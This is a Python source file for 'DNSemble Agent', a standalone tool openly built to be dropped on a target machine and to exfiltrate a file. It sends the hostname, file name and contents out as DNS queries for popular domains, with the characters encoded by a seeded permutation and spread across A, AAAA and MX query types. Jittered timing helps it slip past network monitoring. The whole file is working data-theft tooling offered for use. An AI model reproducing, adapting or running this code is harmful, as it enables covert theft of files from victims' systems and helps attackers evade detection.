#!/usr/bin/env python3
"""
DNSemble Agent — standalone DNS exfiltration client (pure Python, zero deps)
Generated by DNSemble server.  Drop on target → run → receive loot.
"""

import socket
import struct
import sys
import os
import time
import random
import argparse
from datetime import datetime

# ── Configuration (baked at generation time) ─────────────────────────────
SERVER_HOST = "127.0.0.1"
SERVER_PORT = 53333
DEFAULT_DELAY  = 100
DEFAULT_JITTER = 50

# ── Domain pool & protocol constants ─────────────────────────────────────
CONTROL_DOMAIN = "googleapis.com"

DOMAINS = [
    "google.com", "youtube.com", "facebook.com", "twitter.com",
    "instagram.com", "linkedin.com", "reddit.com", "pinterest.com",
    "tumblr.com", "snapchat.com", "github.com", "stackoverflow.com",
    "microsoft.com", "apple.com", "amazon.com", "netflix.com",
    "spotify.com", "twitch.tv", "discord.com", "telegram.org",
    "ebay.com", "walmart.com", "target.com", "bestbuy.com",
    "etsy.com", "shopify.com", "paypal.com", "stripe.com",
    "squarespace.com", "wix.com", "godaddy.com", "namecheap.com",
    "cloudflare.com", "cnn.com", "bbc.com", "nytimes.com",
    "reuters.com", "forbes.com", "bloomberg.com", "wsj.com",
    "theguardian.com", "washingtonpost.com", "usatoday.com", "espn.com",
    "weather.com", "imdb.com", "rottentomatoes.com", "hulu.com",
    "disneyplus.com", "soundcloud.com", "vimeo.com", "dailymotion.com",
    "deviantart.com", "flickr.com", "booking.com", "expedia.com",
    "tripadvisor.com", "airbnb.com", "uber.com", "lyft.com",
    "zillow.com", "realtor.com", "yelp.com", "opentable.com",
    "dropbox.com", "box.com", "notion.so", "trello.com",
    "slack.com", "zoom.us", "skype.com", "evernote.com",
    "todoist.com", "asana.com", "wikipedia.org", "quora.com",
    "khanacademy.org", "coursera.org", "udemy.com", "edx.org",
    "duolingo.com", "archive.org", "britannica.com", "dictionary.com",
    "yahoo.com", "bing.com", "duckduckgo.com", "brave.com",
    "whatsapp.com", "signal.org", "tiktok.com", "claude.ai",
    "anthropic.com", "openai.com", "x.com", "tesla.com",
    "spacex.com", "oracle.com",
]

_PRINTABLE = [chr(i) for i in range(32, 127)]
_SPECIAL   = ["\n", "\t", "\r"]
ALL_CHARS  = _PRINTABLE + _SPECIAL
CHAR_TO_INDEX = {ch: i for i, ch in enumerate(ALL_CHARS)}

QTYPE_A    = 1
QTYPE_MX   = 15
QTYPE_AAAA = 28
QTYPE_LABELS = {QTYPE_A: "A", QTYPE_AAAA: "AAAA", QTYPE_MX: "MX"}

CTRL_SESSION_START = 0
CTRL_END_HOSTNAME  = 1
CTRL_END_FILENAME  = 2
CTRL_END_CONTENT   = 3
CTRL_CHUNK_OFFSET  = 3

# ── Crypto / mapping ────────────────────────────────────────────────────
def generate_permutation(seed):
    rng = random.Random(seed)
    perm = list(range(len(ALL_CHARS)))
    rng.shuffle(perm)
    return perm

def build_char_to_domain(perm):
    return {ALL_CHARS[ci]: DOMAINS[perm[ci]] for ci in range(len(perm))}

def ip_to_seed(ip_bytes):
    return int.from_bytes(ip_bytes, "big")

# ── DNS wire-format helpers ──────────────────────────────────────────────
def encode_domain_name(domain):
    out = b""
    for label in domain.split("."):
        out += struct.pack("B", len(label)) + label.encode("ascii")
    return out + b"\x00"

def encode_txid(client_id, seq_num):
    return ((client_id & 0xFF) << 8) | (seq_num & 0xFF)

def build_dns_query(txid, domain, qtype):
    header = struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0)
    question = encode_domain_name(domain) + struct.pack("!2H", qtype, 1)
    return header + question

def parse_a_record(data):
    if len(data) < 12:
        return None
    ancount = struct.unpack("!H", data[6:8])[0]
    if ancount < 1:
        return None
    offset = 12
    while offset < len(data) and data[offset] != 0:
        offset += 1 + data[offset]
    offset += 1 + 4
    if offset + 2 > len(data):
        return None
    if (data[offset] & 0xC0) == 0xC0:
        offset += 2
    else:
        while offset < len(data) and data[offset] != 0:
            offset += 1 + data[offset]
        offset += 1
    if offset + 10 > len(data):
        return None
    rtype = struct.unpack("!H", data[offset:offset + 2])[0]
    offset += 8
    rdlen = struct.unpack("!H", data[offset:offset + 2])[0]
    offset += 2
    if rtype == 1 and rdlen == 4 and offset + 4 <= len(data):
        return data[offset:offset + 4]
    return None

# ── Network helpers ──────────────────────────────────────────────────────
def _send(sock, server, port, txid, domain, qtype):
    pkt = build_dns_query(txid, domain, qtype)
    sock.sendto(pkt, (server, port))
    try:
        resp, _ = sock.recvfrom(4096)
        return True, resp
    except socket.timeout:
        return False, None

def _send_ctrl(sock, server, port, cid, ctrl_seq):
    txid = encode_txid(cid, ctrl_seq)
    return _send(sock, server, port, txid, CONTROL_DOMAIN, QTYPE_A)

# ── Data-phase sender ───────────────────────────────────────────────────
def send_phase(sock, server, port, cid, text, qtype, delay, jitter, char_to_domain):
    total = len(text)
    sent = 0
    seq = 0
    chunk = 0

    for ch in text:
        domain = char_to_domain.get(ch)
        if domain is None:
            continue

        txid = encode_txid(cid, seq)
        _send(sock, server, port, txid, domain, qtype)
        sent += 1
        seq += 1

        if seq > 255:
            chunk += 1
            _send_ctrl(sock, server, port, cid, CTRL_CHUNK_OFFSET + chunk)
            seq = 0

        pct = sent * 100 // total if total else 100
        w = 30
        filled = sent * w // total if total else w
        bar = "#" * filled + "-" * (w - filled)
        print(f"\r  [{bar}]  {sent}/{total}  {pct}%  ", end="", flush=True)

        d = delay + random.uniform(-jitter, jitter)
        if d > 0:
            time.sleep(d)

    if total:
        print(f"\r  [{'#' * 30}]  {sent}/{total}  100%  DONE")
    return sent

# ── Main exfiltration flow ──────────────────────────────────────────────
def exfiltrate(filepath, server=None, port=None, delay=None, jitter=None, cid=None):
    server = server or SERVER_HOST
    port   = port or SERVER_PORT
    delay_s  = (delay if delay is not None else DEFAULT_DELAY) / 1000.0
    jitter_s = (jitter if jitter is not None else DEFAULT_JITTER) / 1000.0

    if not os.path.isfile(filepath):
        print(f"[!] File not found: {filepath}")
        sys.exit(1)

    with open(filepath, "r") as f:
        content = f.read()

    hostname = socket.gethostname()
    filename = os.path.basename(filepath)
    cid = cid if cid is not None else random.randint(1, 255)

    print(f"[*] DNSemble Agent")
    print(f"    Server:   {server}:{port}")
    print(f"    Client:   #{cid}")
    print(f"    File:     {filepath} ({len(content)} bytes)")
    print(f"    Timing:   {delay_s*1000:.0f}ms delay, {jitter_s*1000:.0f}ms jitter")
    print()

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(2.0)
    t0 = time.time()
    queries = 0

    # Phase 0: SESSION_START
    print("[*] Negotiating session ...")
    seed = None
    for attempt in range(3):
        ok, resp = _send_ctrl(sock, server, port, cid, CTRL_SESSION_START)
        queries += 1
        if ok and resp:
            ip_bytes = parse_a_record(resp)
            if ip_bytes:
                seed = ip_to_seed(ip_bytes)
                break
        time.sleep(0.5)

    if seed is None:
        print("[!] Failed to negotiate session")
        sock.close()
        sys.exit(1)

    perm = generate_permutation(seed)
    char_to_domain = build_char_to_domain(perm)
    print(f"[+] Session established (seed=0x{seed:08X})")

    time.sleep(delay_s)

    # Phase 1: hostname (AAAA)
    print(f"[*] Sending hostname: {hostname}")
    n = send_phase(sock, server, port, cid, hostname, QTYPE_AAAA, delay_s, jitter_s, char_to_domain)
    queries += n
    _send_ctrl(sock, server, port, cid, CTRL_END_HOSTNAME)
    queries += 1
    time.sleep(delay_s)

    # Phase 2: filename (MX)
    print(f"[*] Sending filename: {filename}")
    n = send_phase(sock, server, port, cid, filename, QTYPE_MX, delay_s, jitter_s, char_to_domain)
    queries += n
    _send_ctrl(sock, server, port, cid, CTRL_END_FILENAME)
    queries += 1
    time.sleep(delay_s)

    # Phase 3: content (A)
    print(f"[*] Sending content ({len(content)} chars)")
    n = send_phase(sock, server, port, cid, content, QTYPE_A, delay_s, jitter_s, char_to_domain)
    queries += n
    _send_ctrl(sock, server, port, cid, CTRL_END_CONTENT)
    queries += 1

    sock.close()
    elapsed = time.time() - t0
    print(f"\n[+] Done! {queries} queries in {elapsed:.1f}s ({queries/elapsed:.1f} q/s)")

# ── CLI ──────────────────────────────────────────────────────────────────
if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="DNSemble Agent")
    ap.add_argument("file", help="File to exfiltrate")
    ap.add_argument("-s", "--server", default=None, help=f"Override server (default: {SERVER_HOST})")
    ap.add_argument("-p", "--port", type=int, default=None, help=f"Override port (default: {SERVER_PORT})")
    ap.add_argument("-d", "--delay", type=float, default=None, help=f"Delay in ms (default: {DEFAULT_DELAY})")
    ap.add_argument("-j", "--jitter", type=float, default=None, help=f"Jitter in ms (default: {DEFAULT_JITTER})")
    ap.add_argument("-c", "--client-id", type=int, default=None, help="Client ID 0-255 (default: random)")
    args = ap.parse_args()
    exfiltrate(args.file, args.server, args.port, args.delay, args.jitter, args.client_id)
